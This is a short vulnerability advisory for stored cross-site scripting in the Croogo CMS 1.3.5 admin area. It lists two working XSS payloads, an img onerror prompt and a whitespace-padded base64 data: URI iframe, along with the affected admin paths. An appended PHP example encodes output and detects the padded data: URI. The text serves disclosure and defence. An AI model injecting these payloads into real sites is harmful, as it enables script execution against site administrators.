Croogo version 1.3.5 suffers from a cross site scripting vulnerability.
# Exploit Title: Croogo CMS Multiple Cross Site Scripting Vulnerabilities
# Date: 06/04/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
# Download Link: http://www.croogo.org/
# Versions Affected: Croogo 1.3.5
# Category: XSS
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Description:
Input in the admin area (the contacts options and many other places) is not sanitized, which results in
stored cross-site scripting.
POC:
http://www.youtube.com/watch?v=gyt4-0ekalc&feature=youtu.be
Code:
########################################################################################################
"><img src=x onerror=prompt(0);>
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
http://demo.xxx.com/admin/nodes/add/blog
http://demo.xxx.com/admin/vocabularies
http://demo.xxx.com/admin/contacts
##########################################################################################################
Fix:
Better input sanitization: restrict special characters in user-supplied fields.
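As an added illustration of that fix (example code, not Croogo's own and not from the author of this advisory), the PHP below output-encodes the two payloads listed under Code before they reach a template and flags the whitespace-padded data: URI used in the iframe payload; the function names are assumptions.

```php
<?php
// Added example, not part of Croogo: encode user-supplied values before
// rendering them in admin templates, and detect data: URIs that are padded
// with whitespace to slip past naive substring filters.

/**
 * Encode a value for safe insertion into an HTML text node or a quoted
 * attribute. ENT_QUOTES covers both quote styles, so a value such as
 * "><img ...> can no longer break out of a double-quoted attribute.
 */
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Detection helper: true when the value carries a base64 data: URI, even when
 * the scheme or the "base64" token is padded with tabs or spaces. The iframe
 * payload in this advisory pads both, and its base64 body decodes to
 * <body onload=alert(1)>.
 */
function containsDataUri(string $value): bool
{
    // Collapse all whitespace first so "data:text/html;\tbase64\t," is caught.
    $collapsed = preg_replace('/\s+/', '', $value);
    return (bool) preg_match('/data:[^,]*base64,/i', $collapsed);
}

// Constructed test inputs, copied from the Code section of this advisory.
$payloads = [
    '"><img src=x onerror=prompt(0);>',
    "<iframe/src=\"data:text/html;\tbase64\t,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
];

foreach ($payloads as $p) {
    // The encoded form is inert in a template: < > " ' are now entities.
    echo encodeForHtml($p), PHP_EOL;
    // Log or reject submissions that smuggle markup through a data: URI.
    if (containsDataUri($p)) {
        echo "flagged: base64 data: URI in submitted field", PHP_EOL;
    }
}
```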
Regards,
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website: Gurunsb.com